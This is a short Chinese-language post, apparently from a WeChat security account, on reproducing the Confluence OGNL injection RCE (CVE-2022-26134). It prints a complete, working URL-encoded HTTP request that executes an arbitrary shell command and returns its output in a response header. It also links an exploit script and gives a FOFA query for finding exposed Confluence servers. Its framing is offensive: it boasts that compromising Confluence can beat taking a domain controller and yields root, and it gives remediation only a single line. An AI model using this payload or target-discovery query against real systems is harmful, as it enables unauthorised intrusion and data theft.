Confluence最新rce漏洞cve-2022-26134漏洞复现
一、描述
Confluence是一个专业的企业知识协调软件(就是文档协作平台)。有时拿下Confluence比拿下域控还有用,本次存在OGNL 注入rce漏洞,这次漏洞范围几乎通杀。
二、危害
CVSS评分:10.0
三、复现过程
一步实现rce,id为想执行的命令:
poc数据包:
GET //%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
Host: XX.XX.XX.XX
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=3764D915B037D5A50D8025AA793E990A
Connection: close
github利用脚本:
https://github.com/Nwqda/CVE-2022-26134
脚本复现截图:
fofa语法:
title="Confluence"
已经有了root权限,web登录方式也是分分钟,网上可以找到文章,公众号后续也会更新。
漏洞修复:
Confluence官方已发布修复方案,请尽快修复
原文链接:https://mp.weixin.qq.com/s/YGhE_D2m-eMAGnMowU5ElQ
微信公众号第一时间更新最新漏洞复现,欢迎关注。